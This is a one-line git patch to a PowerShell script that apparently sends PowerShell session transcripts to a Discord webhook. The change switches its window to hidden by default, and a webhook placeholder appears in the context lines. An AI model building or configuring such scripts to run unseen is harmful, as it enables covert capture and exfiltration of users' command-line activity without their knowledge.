From 91f1087b0ccd552866c2d5a98fb3bfd6e8bd83f5 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 3 Apr 2024 19:16:32 +0000 Subject: [PATCH] Update main.ps1 --- Global-PS-Trascription-to-Discord/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Global-PS-Trascription-to-Discord/main.ps1 b/Global-PS-Trascription-to-Discord/main.ps1 index 72df121..6862170 100644 --- a/Global-PS-Trascription-to-Discord/main.ps1 +++ b/Global-PS-Trascription-to-Discord/main.ps1 @@ -18,7 +18,7 @@ if ($dc.Length -eq 0){ $dc = "YOUR_WEBHOOK_HERE" } -$hideWindow = 0 # 1 = Hidden +$hideWindow = 1 # 1 = Hidden [Console]::BackgroundColor = "Black" [Console]::SetWindowSize(60, 20)